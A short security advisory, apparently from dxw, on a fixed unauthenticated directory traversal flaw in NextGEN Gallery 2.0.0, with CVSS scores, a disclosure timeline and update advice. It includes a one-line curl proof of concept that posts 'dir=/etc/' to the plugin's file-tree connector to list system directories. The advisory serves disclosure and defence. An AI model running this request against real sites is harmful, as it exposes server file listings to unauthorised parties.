Directory traversal in NextGEN Gallery 2.0.0

Vulnerability

Last revised: August 8, 2013

An unauthenticated POST request to a particular URI with a particular parameter lists the contents of arbitrary directories.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score	5 Medium
Vector	Network
Complexity	Low
Authentication	None
Confidentiality	Partial
Integrity	None
Availability	None

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

curl -i -d 'dir=/etc/' http://localhost/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_addgallery_page/static/jquery.filetree/connectors/jqueryFileTree.php

Advisory timeline

2013-08-09: Reported to vendor
2013-08-09: Vendor reports fixed
2014-02-18: Published
2015-07-14: Re-requested CVE

Mitigation/further actions

This issue is reported to be fixed as of version 2.0.7. Prior versions should be updated immediately.

dxw advisories

Advisory: